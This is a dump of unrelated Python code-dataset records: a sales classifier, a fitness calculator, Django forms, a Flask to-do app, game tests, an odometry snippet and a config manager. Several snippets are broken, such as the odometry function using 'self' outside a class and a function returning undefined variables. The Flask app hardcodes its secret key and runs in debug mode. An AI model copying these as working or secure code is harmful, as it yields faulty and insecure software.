descent classifier\r\n# written by Anthony Paech 29/11/19\r\n#\r\n# Take a excel spreadsheet that is a slice of the salestrans\r\n# ideally, filtered by customer code and product group and saved as a CSV\r\n# such that the features are simply\r\n# \"productcode\" \"day_delta\"\r\n# and the classes are binned values of the \"qty\"\r\n# these are read into a dictionary (the DictVectoriser is forgiving and very good)\r\n# and vectorised with one hot encoder\r\n# also test the accuracy with other models like naive bayes, random forest and Support vector machine\r\n#\r\n# pseudocode\r\n# load slice of sales trans straight from excel\r\n# choose columns X,y\r\n# cleanup NaN's\r\n# convert date to day_delta\r\n# create order_day_delta (the day gap between the last order and this one)\r\n# split into X_train, X_test, y_train, y_test\r\n# convert X_train and X_test to dictionaries\r\n# convert y_train, y_test to np.array()\r\n# bin the Y_train, Y_test data\r\n# use DictVectorizer on X_train\r\n# use SGDClassifier object\r\n# run using GridSearch\r\n# use ROC AUC to score predictions on y_test based on X_test\r\n#\r\n\r\n\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.svm import SVC\r\n\r\ndef day_delta(df):\r\n\r\n# df['day_delta'] = (df.date.max()-df.date).dt.days.astype(int)\r\n df['day_delta'] = (df.date-df.date.min()).dt.days\r\n df.drop(columns='date',axis=1,inplace=True)\r\n # df.drop(df['date'],inplace=True)\r\n## date_N_days_ago = datetime.now() - timedelta(days=2)\r\n##\r\n## print(datetime.now())\r\n## print(date_N_days_ago)\r\n return df\r\n\r\ndef read_in_csvdata(filename,n, offset=0):\r\n X_dict, y = [], []\r\n with open(filename, 'r') as csvfile:\r\n reader = csv.DictReader(csvfile)\r\n for i in range(offset):\r\n next(reader)\r\n i = 0\r\n for row in reader:\r\n i += 1\r\n y.append(int(row['qty']))\r\n del row['qty'] #, row['location'], row['code'], row['refer'], row['linenumber']\r\n X_dict.append(row)\r\n if i >= n:\r\n break\r\n return X_dict, y\r\n\r\n\r\ndef read_in_exceldata(filename,n): #,offset=0):\r\n df=pd.read_excel(filename, \"Sheet1\")\r\n X=df.iloc[0:n,:2]\r\n Y=df.iloc[0:n,4].values\r\n# print(X)\r\n X=day_delta(X)\r\n # 
print(\"X=\\n\",X)\r\n #print(Counter(Y))\r\n # X_train, X_test, y_train, y_test = train_test_split(X,Y, test_size=0.2,random_state=42)\r\n # print(\"x train=\",X_train[:10])\r\n # X_dict_train=dict(X_train)\r\n #d = dict(enumerate(myarray.flatten(), 1))\r\n # X_dict_test=dict(X_test)\r\n return X_dict_train,X_dict_test,y_train,y_test\r\n\r\n\r\ndef read_excel(filename,rows):\r\n xls = pd.ExcelFile(filename) #'salestransslice1.xlsx')\r\n if rows==-1:\r\n return xls.parse(xls.sheet_names[0])\r\n else: \r\n return xls.parse(xls.sheet_names[0]).head(rows)\r\n\r\n\r\ndef write_excel(df,outfilename):\r\n df.to_excel(outfilename) #'salestransslice1.xlsx')\r\n return\r\n \r\ndef write_csv(df,outfilename):\r\n df.to_csv(outfilename,index=False) #'salestransslice1.xlsx')\r\n return\r\n \r\n\r\n\r\ndef discrete_ybins(array,bins):\r\n # divide the classes (or features) into a bucket number of equally sized ranges\r\n return pd.cut(array.astype(float),bins,labels=range(len(bins)-1),right=True,retbins=False) #.astype(int)\r\n \r\n\r\nn = 3000\r\nn2=800\r\nbins=[0,8,16,10000]\r\ninfile=\"salestransslice4-FLNOR.xlsx\"\r\noutfile=\"salestransslice4-FLNOR.csv\"\r\ndf=read_excel(infile,-1)\r\ndf=day_delta(df)\r\n\r\ndf['qty_bins']=pd.cut(df['qty'].values.astype(float),bins,labels=range(len(bins)-1),right=True,retbins=False)\r\nprint(\"df=\\n\",df.to_string())\r\ndf.dropna(inplace=True)\r\nwrite_csv(df,outfile)\r\n\r\n\r\n\r\nX_dict,y_list = read_in_csvdata(outfile,n,offset=0)\r\n\r\n#print(\"X_dict=\\n\",X_dict[:10],\"y_list=\\n\",y_list[:10])\r\n#print(list(X_dict)[:10])\r\n#X_train, X_test, y_train, y_test = train_test_split(list(X_dict),y_list, test_size=0.2,random_state=42)\r\n\r\n\r\ndict_one_hot_encoder = DictVectorizer(sparse=False)\r\nX_train = dict_one_hot_encoder.fit_transform(X_dict)\r\n#print(\"X_train=\\n\",X_train)\r\n\r\n\r\ny_train = discrete_ybins(np.array(y_list),bins)\r\n#print(\"y_train=\\n\",y_train)\r\n\r\n\r\n\r\nX_dict,y_list = read_in_csvdata(\"salestransslice4-FLNOR.csv\",n2,offset=n)\r\nX_test = dict_one_hot_encoder.transform(X_dict)\r\nprint(\"X_test=\\n\",X_test[:10])\r\n\r\n\r\ny_test= discrete_ybins(np.array(y_list),bins)\r\nprint(\"y_test=\\n\",y_test[:10])\r\n\r\n# Use scikit-learn package\r\n\r\nsgd_lr = SGDClassifier(loss='log', penalty=None, fit_intercept=True, max_iter=500, learning_rate='constant', eta0=0.01)\r\nsgd_lr.fit(X_train, y_train)\r\n\r\npredictions = sgd_lr.predict_proba(X_test)[:, 1]\r\nprint('The ROC AUC on testing set is: {0:.3f}'.format(roc_auc_score(y_test, predictions)))\r\n\r\n\r\n\r\n# Feature selection with L1 regularization\r\n##\r\n##l1_feature_selector = SGDClassifier(loss='log', penalty='l1', alpha=0.0001, fit_intercept=True, max_iter=5, learning_rate='constant', eta0=0.01)\r\n##l1_feature_selector.fit(X_train_10k, y_train_10k)\r\n###X_train_10k_selected = l1_feature_selector.transform(X_train_10k)\r\n##print(X_train_10k_selected.shape)\r\n##print(X_train_10k.shape)\r\n##\r\n### bottom 10 weights and the corresponding 10 least important features\r\n##print(np.sort(l1_feature_selector.coef_)[0][:10])\r\n##print(np.argsort(l1_feature_selector.coef_)[0][:10])\r\n### top 10 weights and the corresponding 10 most important features\r\n##print(np.sort(l1_feature_selector.coef_)[0][-10:])\r\n##print(np.argsort(l1_feature_selector.coef_)[0][-10:])\r\n\r\n\r\n\r\n\r\n\r\n# Multiclass classification with logistic regression\r\n\r\n##from sklearn.feature_extraction.text import TfidfVectorizer\r\n##from sklearn.datasets import fetch_20newsgroups\r\n##from 
sklearn.linear_model import SGDClassifier\r\n##from nltk.corpus import names\r\n##from nltk.stem import WordNetLemmatizer\r\n\r\n##all_names = set(names.words())\r\n##lemmatizer = WordNetLemmatizer()\r\n##\r\n##def letters_only(astr):\r\n## for c in astr:\r\n## if not c.isalpha():\r\n## return False\r\n## return True\r\n##\r\n##def clean_text(docs):\r\n## cleaned_docs = []\r\n## for doc in docs:\r\n## cleaned_docs.append(' '.join([lemmatizer.lemmatize(word.lower())\r\n## for word in doc.split()\r\n## if letters_only(word)\r\n## and word not in all_names]))\r\n## return cleaned_docs\r\n##\r\n##data_train = fetch_20newsgroups(subset='train', categories=None, random_state=42)\r\n##data_test = fetch_20newsgroups(subset='test', categories=None, random_state=42)\r\n##\r\n##cleaned_train = clean_text(data_train.data)\r\n##label_train = data_train.target\r\n##cleaned_test = clean_text(data_test.data)\r\n##label_test = data_test.target\r\n##\r\n##tfidf_vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5, stop_words='english', max_features=40000)\r\n##term_docs_train = tfidf_vectorizer.fit_transform(cleaned_train)\r\n##term_docs_test = tfidf_vectorizer.transform(cleaned_test)\r\n\r\n# combined with grid search\r\nfrom sklearn.model_selection import GridSearchCV\r\nparameters = {'penalty': ['l2', None],\r\n 'alpha': [1e-07, 1e-06, 1e-05, 1e-04],\r\n 'eta0': [0.01, 0.1, 1, 10]}\r\n\r\nsgd_lr = SGDClassifier(loss='log', learning_rate='constant', eta0=0.01, fit_intercept=True, max_iter=50)\r\n\r\ngrid_search = GridSearchCV(sgd_lr, parameters, n_jobs=-1, cv=3)\r\n\r\ngrid_search.fit(X_train, y_train)\r\nprint(grid_search.best_params_)\r\n\r\nsgd_lr_best = grid_search.best_estimator_\r\naccuracy = sgd_lr_best.score(X_test, y_test)\r\nprint('The accuracy on testing set is: {0:.1f}%'.format(accuracy*100))\r\n","sub_path":"SGDC_v1-00.py","file_name":"SGDC_v1-00.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112327171","text":"from numpy import * # provides complex math and array functions\nimport hashlib\nimport GetInputData\nimport re\nimport sklearn.model_selection as ms\n#------------------------------------------------------------------------------\ndef cv_predict(model, set_x, set_y):\n # Predict using cross validation.\n yhat = empty_like(set_y)\n for idx in range(0, yhat.shape[0]):\n train_x = delete(set_x, idx, axis=0)\n train_y = delete(set_y, idx, axis=0)\n model = model.fit(train_x, train_y)\n yhat[idx] = model.predict(set_x[idx].reshape(1, -1))\n return yhat\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef calc_fitness(xi, Y, Yhat, c=2):\n \"\"\"\n Calculate fitness of a prediction.\n xi : array_like -- Mask of features to measure fitness of. 
Must be of dtype bool.\n c : float -- Adjustment parameter.\n \"\"\"\n p = len(xi) # Number of selected parameters\n n = len(Y) # Sample size\n numer = ((Y - Yhat)**2).sum()/n # Mean square error\n pcn = p*(c/n)\n if pcn >= 1:\n return 1000\n denom = (1 - pcn)**2\n theFitness = numer/denom\n return theFitness\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef InitializeTracks():\n trackDesc = {}\n trackFitness = {}\n trackCoefficients = {}\n trackModel = {}\n trackR2 = {}\n trackQ2 = {}\n trackR2PredValidation = {}\n trackR2PredTest = {}\n return trackDesc, trackFitness, trackCoefficients, trackModel, trackR2, trackQ2, \\\n trackR2PredValidation, trackR2PredTest\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef initializeYDimension():\n yTrain = {}\n yHatTrain = {}\n yHatCV = {}\n yValidation = {}\n yHatValidation = {}\n yTest = {}\n yHatTest = {}\n return yTrain, yHatTrain, yHatCV, yValidation, yHatValidation, yTest, yHatTest\n#------------------------------------------------------------------------------\ndef OnlySelectTheOnesColumns(popI):\n numOfFea = popI.shape[0]\n xi = zeros(numOfFea)\n for j in range(numOfFea):\n xi[j] = popI[j]\n xi = xi.nonzero()[0]\n xi = xi.tolist()\n return xi\n# -----------------------------------------------------------------------------\ndef cv_score(model, X_train_masked, X_validation_masked, X_test_masked,\n TrainY, ValidateY, TestY):\n\n numPop = TrainY.shape[0] + ValidateY.shape[0] + TestY.shape[0]\n alltargets = zeros(numPop)\n alltargets[0:TrainY.shape[0]] = TrainY\n alltargets[TrainY.shape[0]:TrainY.shape[0]+ValidateY.shape[0]] = ValidateY\n alltargets[TrainY.shape[0] + ValidateY.shape[0]:] = TestY\n\n\n print(alltargets)\n\n alldescriptors = zeros(numPop)\n\n exit(0)\n\n q2_loo = ms.cross_val_score(model, alldescriptors, alltargets).mean()\n\n#------------------------------------------------------------------------------\ndef validate_model(model, fileW, population, TrainX, TrainY, ValidateX, ValidateY,\n TestX, TestY, algorithm_name='GA', model_name='MLR', linear=1):\n numOfPop = population.shape[0]\n fitness = zeros(numOfPop)\n c = 2\n false = 0\n true = 1\n predictive = false\n\n trackDesc, trackFitness, trackCoefficients, trackModel,trackR2, trackQ2, \\\n trackR2PredValidation, trackR2PredTest = InitializeTracks()\n\n unfit = 1000\n itFits = 1\n for i in range(numOfPop):\n xi = OnlySelectTheOnesColumns(population[i])\n\n idx = hashlib.sha1(array(xi)).digest()\n\n X_train_masked = TrainX.T[xi].T\n X_validation_masked = ValidateX.T[xi].T\n X_test_masked = TestX.T[xi].T\n\n all_descriptors, all_targets = GetInputData.recombineSets(TrainX, ValidateX, TestX, TrainY, ValidateY, TestY)\n X_all_masked = all_descriptors.T[xi].T\n\n try:\n MLRmodel = model.fit(X_train_masked, TrainY)\n except:\n return unfit, fitness\n\n # Computed predicted values\n Yhat_cv = cv_predict(model, X_train_masked, TrainY) # Cross Validation prediction\n Yhat_train = model.predict(X_train_masked)\n Yhat_validation = model.predict(X_validation_masked)\n Yhat_test = model.predict(X_test_masked)\n\n # Compute R2 statistics (Prediction for Validation and Test set)\n cv = ms.ShuffleSplit(n_splits=5, test_size=0.3, random_state=0)\n #q2_loo = cv_score(model, X_train_masked, X_validation_masked, X_test_masked, TrainY, ValidateY, TestY)\n q2_loo = ms.cross_val_score(estimator=model, X=X_all_masked, y=all_targets, 
cv=cv).mean()\n\n        r2_train = model.score(X_train_masked, TrainY)\n        r2pred_validation = model.score(X_validation_masked, ValidateY)\n        r2pred_test = model.score(X_test_masked, TestY)\n\n        Y_fitness = append(TrainY, ValidateY)\n        Yhat_fitness = append(Yhat_cv, Yhat_validation)\n\n        fitness[i] = calc_fitness(xi, Y_fitness, Yhat_fitness, c)\n\n        if predictive and ((q2_loo < 0.5) or (r2pred_validation < 0.5) or (r2pred_test < 0.5)):\n            # if it's not worth recording, just return the fitness\n            print(\"Ending program, fitness unacceptably low: \", predictive)\n            continue\n\n        coefficients = []\n        if linear == 1:\n            # use a distinct loop variable so the adjustment parameter c is not clobbered\n            for coef in model.coef_:\n                coefficients.append(float(\"%.4f\"%coef))\n\n        # store stats\n        #trackDesc[idx] = str(xi)\n        trackDesc[idx] = (re.sub(\",\", \"_\", str(xi)))\n        trackFitness[idx] = GetInputData.getTwoDecPoint(fitness[i])\n        trackCoefficients[idx] = (re.sub(\",\", \"_\", str(coefficients)))\n        trackModel[idx] = algorithm_name + ' with ' + model_name\n        trackR2[idx] = GetInputData.getTwoDecPoint(r2_train)\n        trackQ2[idx] = GetInputData.getTwoDecPoint(q2_loo)\n        trackR2PredValidation[idx] = GetInputData.getTwoDecPoint(r2pred_validation)\n        trackR2PredTest[idx] = GetInputData.getTwoDecPoint(r2pred_test)\n\n    write(fileW, trackDesc, trackCoefficients, trackFitness, trackModel,\n          trackR2, trackQ2, trackR2PredValidation, trackR2PredTest)\n    return itFits, fitness.copy()\n#------------------------------------------------------------------------------\ndef write(fileW, descriptors, coefficients, fitnesses, modelnames, r2trainscores,\n          q2scores, r2validscores, r2testscores):\n    for key in fitnesses.keys():\n        #if r2trainscores[key] >= 0.5 and r2validscores[key] >= 0.5 \\\n        #    and q2scores[key] >= 0.5 and r2testscores[key] >= 0.5:\n        fileW.writerow([descriptors[key], coefficients[key], fitnesses[key], modelnames[key], r2trainscores[key], q2scores[key], r2validscores[key], r2testscores[key]])\n\n    #fileOut.close()\n#------------------------------------------------------------------------------","sub_path":"Mining Program/CalcFitness.py","file_name":"CalcFitness.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262888786","text":"from django import forms\nfrom manager.models import roletable, UserInfoTable,ProductBrand,\\\n    ProductCategory,ProductSubCategory,ProductType,ProductDetails,\\\n    ProductSize,ProductStock\n\n\nclass roletableForm(forms.ModelForm):\n    class Meta():\n        model = roletable\n        exclude = [\"roleid\", \"rolename\"]\n\n\nclass UserInfoTableForm(forms.ModelForm):\n    class Meta():\n        model = UserInfoTable\n\n        exclude = [\"tbuserroleid\", \"tbuseremail\", \"tbusername\", \"tbuserpassword\", \"tbusermob\",\n                   \"tbuseraltmob\", \"tbuserimage\", \"tbuserpan\", \"tbuserpanimage\", \"tbuseradhar\",\n                   \"tbuseradharimage\", \"tbisactive\", \"tbuseraddress\", \"tbuserpincode\", \"tbotp\",\n                   \"tbotptime\", \"tbisverified\", \"tbauthtoken\"]\n\n\nclass ProductTypeForm(forms.ModelForm):\n    class Meta():\n        model = ProductType\n        exclude = [\"tbproducttypeid\", \"tbproducttypename\", \"type_is_active\"]\n\nclass ProductCategoryForm(forms.ModelForm):\n    class Meta():\n        model = ProductCategory\n        exclude = [\"tbcategoryid\", \"tbcategorytype\", \"category_is_active\"]\n\nclass ProductBrandForm(forms.ModelForm):\n    class Meta():\n        model = ProductBrand\n        exclude = [\"tbbrandid\", \"tbbrandname\", \"brand_is_active\"]\n\n\nclass ProductSizeForm(forms.ModelForm):\n    class Meta():\n        model = ProductSize\n        exclude = [\"tbproductsizeid\", 
\"tbproductsize\", \"tbcategoryid\", \"size_is_active\"]\n\nclass ProductSubCategoryForm(forms.ModelForm):\n class Meta():\n model = ProductSubCategory\n exclude = [\"tbsubcategoryid\",\"tbsubcategoryname\",\"fkcategoryid\"]\n\n\n\nclass ProductDetailsForm(forms.ModelForm):\n class Meta():\n model = ProductDetails\n exclude = [\"tbproductid\",\"fkproducttypeid\",\"fkproductcategoryid\",\n \"fkproductbrandid\",\"fksubcategoryid\",\"tbproductname\",\\\n \"tbproductprice\",\\\n \"tbproductdescription\",\"tbproductimage1\",\"tbproductimage2\",\\\n \"tbproductimage3\",\\\n \"tbproductimage4\",\"tbproductimage5\",\"tbproductimage6\",\"tbproductimage7\",\n \"tbproductquantity\",\"publishdate\",\\\n \"product_is_active\",\"tbuseremail\"]\n\n\nclass ProductStockForm(forms.ModelForm):\n class Meta():\n model = ProductStock\n exclude = [\"tbproductstockid\",\"fkproductid\",\"fkproductsizeid\",\"tbproductquantity\",\n \"stock_is_active\"]\n","sub_path":"manager/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"634175877","text":"from flask import Flask\nfrom flask import render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///Databases/tasks.db'\ndb = SQLAlchemy(app)\n\nclass Task(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100))\n content = db.Column(db.String(200))\n done = db.Column(db.Boolean)\n\napp.secret_key = \"da8vi2.d\"\n@app.route('/')\ndef home():\n tasks = Task.query.all()\n return render_template('index.html', task = tasks)\n\n@app.route('/create-task', methods=['POST'])\ndef create():\n task = Task(content=request.form['content'], title=request.form['title'], done=False)\n db.session.add(task)\n db.session.commit()\n return redirect(url_for('home'))\n \n\n@app.route('/done/')\ndef done(id):\n task = Task.query.filter_by(id=int(id)).first()\n task.done = not(task.done)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/delete/')\ndef delete(id):\n task = Task.query.filter_by(id=int(id)).delete()\n db.session.commit()\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.run(port = 3000, debug = True)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"145350217","text":"import pytest\n\nfrom hw6 import*\n\n\ndef test_size_submarine():\n submarine = Submarine('1').__reshape__()\n assert (submarine.Shape == np.array(['1', '1', '1'])).all()\n\n\ndef test_size_destroyer():\n destroyer = Destroyer('1').__reshape__()\n assert (destroyer.Shape == np.array(['1', '1', '1', '1'])).all()\n\n\ndef test_size_jet():\n jet = Jet('1').__reshape__()\n assert (jet.Shape == np.array([[0, '1', 0, 0], ['1', '1', '1', '1'], [0, '1', 0, 0]])).all()\n\n\ndef test_general_size():\n general = Ship('1').__reshape__()\n assert (general.Shape == np.array(['1'])).all()\n\n\ndef test_ship_valid_input_name_property():\n try:\n ship = Ship(3.)\n except TypeError:\n return True\n else:\n return False\n\n\ndef test_board_size():\n game = Game((3, 4, 4), 1, 1, 1).create_board()\n assert game.board.size == 48\n\n\ndef test_num_submarines():\n game = Game((3, 4, 4), 2, 1, 1).create_board()\n num_submarine = 0\n more = True\n while more:\n submarines4comp = 
np.ones_like(game.board)\n submarines4comp = np.select([submarines4comp == 1], [\"submarine\" + str(num_submarine)])\n if (game.board == submarines4comp).any():\n num_submarine += 1\n continue\n more = False\n assert num_submarine == 2\n\n\ndef test_num_destroyers():\n game = Game((3, 4, 4), 1, 2, 1).create_board()\n num_destroyer = 0\n more = True\n while more:\n destroyers4comp = np.ones_like(game.board)\n destroyers4comp = np.select([destroyers4comp == 1], [\"destroyer\" + str(num_destroyer)])\n if (game.board == destroyers4comp).any():\n num_destroyer += 1\n continue\n more = False\n assert num_destroyer == 2\n\n\ndef test_num_jets():\n game = Game((3, 8, 8), 1, 1, 2).create_board()\n num_jet = 0\n more = True\n while more:\n jets4comp = np.ones_like(game.board)\n jets4comp = np.select([jets4comp == 1], [\"jet\" + str(num_jet)])\n if (game.board == jets4comp).any():\n num_jet += 1\n continue\n more = False\n assert num_jet == 2\n\n\ndef test_impossible_assignment():\n try:\n game = Game((3, 4, 4), 5, 5, 3)\n except IndexError:\n return True\n else:\n return False\n","sub_path":"test_hw6.py","file_name":"test_hw6.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600734548","text":"def update_Odometry(Odom):\n\n \n position = Odom.pose.pose.position\n \n #Orientation uses the quaternion aprametrization.\n #To get the angular position along the z-axis, the following equation is required.\n q = Odom.pose.pose.orientation\n orientation = np.arctan2(2*(q.w*q.z+q.x*q.y),1-2*(q.y*q.y+q.z*q.z))\n\n if self.Init:\n #The initial data is stored to by subtracted to all the other values as we want to start at position (0,0) and orientation 0\n self.Init = False\n self.Init_ang = orientation\n self.globalAng = self.Init_ang\n Mrot = np.matrix([[np.cos(Init_ang), np.sin(Init_ang)],[-np.sin(Init_ang), np.cos(Init_ang)]]) \n self.Init_pos.x = Mrot.item((0,0))*position.x + Mrot.item((0,1))*position.y\n self.Init_pos.y = Mrot.item((1,0))*position.x + Mrot.item((1,1))*position.y\n self.Init_pos.z = position.z\n\n Mrot = np.matrix([[np.cos(self.Init_ang), np.sin(self.Init_ang)],[-np.sin(self.Init_ang), np.cos(self.Init_ang)]]) \n\n #We subtract the initial values\n self.globalPos.x = Mrot.item((0,0))*position.x + Mrot.item((0,1))*position.y - self.Init_pos.x\n self.globalPos.y = Mrot.item((1,0))*position.x + Mrot.item((1,1))*position.y - self.Init_pos.y\n self.globalAng = orientation - self.Init_ang\n \n \n ","sub_path":"src/Rotation_Script.py","file_name":"Rotation_Script.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633448471","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 18 22:42:49 2016\r\n\r\n@author: DIM\r\n\"\"\"\r\n\r\ndef isWordGuessed(secretWord, lettersGuessed):\r\n\r\n ls=[] \r\n for i in range(len(secretWord)):\r\n ls.append(secretWord[i])\r\n ls=set(ls)\r\n return ls.issubset(lettersGuessed)","sub_path":"week3_pset_1_1.py","file_name":"week3_pset_1_1.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"836902","text":"\n\nfrom xai.brain.wordbase.verbs._minor import _MINOR\n\n#calss header\nclass _MINORS(_MINOR, ):\n\tdef __init__(self,): \n\t\t_MINOR.__init__(self)\n\t\tself.name = \"MINORS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"minor\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/verbs/_minors.py","file_name":"_minors.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603283815","text":"# Copyright © 2020, United States Government, as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All rights reserved.\n#\n# The DELTA (Deep Earth Learning, Tools, and Analysis) platform is\n# licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os.path\n\nimport yaml\nimport pkg_resources\nimport appdirs\n\ndef validate_path(path, base_dir):\n if path == 'default':\n return path\n path = os.path.expanduser(path)\n # make relative paths relative to this config file\n if base_dir:\n path = os.path.normpath(os.path.join(base_dir, path))\n return path\n\ndef validate_positive(num, _):\n if num <= 0:\n raise ValueError('%d is not positive' % (num))\n return num\n\nclass DeltaConfigComponent:\n \"\"\"\n DELTA configuration component.\n\n Handles one subsection of a config file. Generally subclasses\n will want to register fields and components in the constructor,\n and possibly override setup_arg_parser and parse_args to handle\n command line options.\n\n section_header is the title of the section for command line\n arguments in the help.\n \"\"\"\n def __init__(self, section_header = None):\n \"\"\"\n Constructs the component.\n \"\"\"\n self._config_dict = {}\n self._components = {}\n self._fields = []\n self._validate = {}\n self._types = {}\n self._cmd_args = {}\n self._descs = {}\n self._section_header = section_header\n\n def reset(self):\n \"\"\"\n Resets all state in the component.\n \"\"\"\n self._config_dict = {}\n for c in self._components.values():\n c.reset()\n\n def register_component(self, component, name : str, attr_name = None):\n \"\"\"\n Register a subcomponent with a name and attribute name (access as self.attr_name)\n \"\"\"\n assert name not in self._components\n self._components[name] = component\n if attr_name is None:\n attr_name = name\n setattr(self, attr_name, component)\n\n def register_field(self, name : str, types, accessor = None, cmd_arg = None, validate_fn = None, desc = None):\n \"\"\"\n Register a field in this component of the configuration.\n\n types is a single type or a tuple of valid types\n\n validate_fn (optional) should take two strings as input, the field's value and\n the base directory, and return what to save to the config dictionary.\n It should raise an exception if the field is invalid.\n accessor is an optional name to create an accessor function with\n \"\"\"\n self._fields.append(name)\n self._validate[name] = validate_fn\n self._types[name] = types\n self._cmd_args[name] = cmd_arg\n self._descs[name] = desc\n if accessor:\n def access(self) -> types:\n return self._config_dict[name]#pylint:disable=protected-access\n access.__name__ = accessor\n access.__doc__ = desc\n setattr(self.__class__, accessor, access)\n\n def export(self) -> str:\n \"\"\"\n Returns a 
YAML string of all configuration options.\n \"\"\"\n exp = self._config_dict.copy()\n for (name, c) in self._components.items():\n exp[name] = c.export()\n return yaml.dump(exp)\n\n def _set_field(self, name : str, value : str, base_dir : str):\n if name not in self._fields:\n raise ValueError('Unexpected field %s in config file.' % (name))\n if value is not None and not isinstance(value, self._types[name]):\n raise TypeError('%s must be of type %s, is %s.' % (name, self._types[name], value))\n if self._validate[name] and value is not None:\n try:\n value = self._validate[name](value, base_dir)\n except:\n print('Value %s for %s is invalid.' % (value, name))\n raise\n self._config_dict[name] = value\n\n def _load_dict(self, d : dict, base_dir):\n \"\"\"\n Loads the dictionary d, assuming it came from the given base_dir (for relative paths).\n \"\"\"\n for (k, v) in d.items():\n if k in self._components:\n self._components[k]._load_dict(v, base_dir) #pylint:disable=protected-access\n else:\n self._set_field(k, v, base_dir)\n\n def setup_arg_parser(self, parser, components = None) -> None:\n \"\"\"\n Adds arguments to the parser. Must overridden by child classes.\n \"\"\"\n if self._section_header is not None:\n parser = parser.add_argument_group(self._section_header)\n for name in self._fields:\n c = self._cmd_args[name]\n if c is None:\n continue\n parser.add_argument(c, dest=c.replace('-', '_'), required=False,\n type=self._types[name], help=self._descs[name])\n\n for (name, c) in self._components.items():\n if components is None or name in components:\n c.setup_arg_parser(parser)\n\n def parse_args(self, options):\n \"\"\"\n Parse options extracted from an ArgParser configured with\n `setup_arg_parser` and override the appropriate\n configuration values.\n \"\"\"\n d = {}\n for name in self._fields:\n c = self._cmd_args[name]\n if c is None:\n continue\n n = c.replace('-', '_')\n if not hasattr(options, n) or getattr(options, n) is None:\n continue\n d[name] = getattr(options, n)\n self._load_dict(d, None)\n\n for c in self._components.values():\n c.parse_args(options)\n\nclass DeltaConfig(DeltaConfigComponent):\n \"\"\"\n DELTA configuration manager.\n\n Access and control all configuration parameters.\n \"\"\"\n def load(self, yaml_file: str = None, yaml_str: str = None):\n \"\"\"\n Loads a config file, then updates the default configuration\n with the loaded values.\n \"\"\"\n base_path = None\n if yaml_file:\n if not os.path.exists(yaml_file):\n raise Exception('Config file does not exist: ' + yaml_file)\n with open(yaml_file, 'r') as f:\n config_data = yaml.safe_load(f)\n base_path = os.path.normpath(os.path.dirname(yaml_file))\n else:\n config_data = yaml.safe_load(yaml_str)\n self._load_dict(config_data, base_path)\n\n def setup_arg_parser(self, parser, components=None) -> None:\n parser.add_argument('--config', dest='config', action='append', required=False, default=[],\n help='Load configuration file (can pass multiple times).')\n super().setup_arg_parser(parser, components)\n\n def parse_args(self, options):\n for c in options.config:\n self.load(c)\n super().parse_args(options)\n\n def reset(self):\n super().reset()\n self.load(pkg_resources.resource_filename('delta', 'config/delta.yaml'))\n\n def initialize(self, options, config_files = None):\n \"\"\"\n Loads the default files unless config_files is specified, in which case it\n loads them. 
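Later files in the list override earlier ones. 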
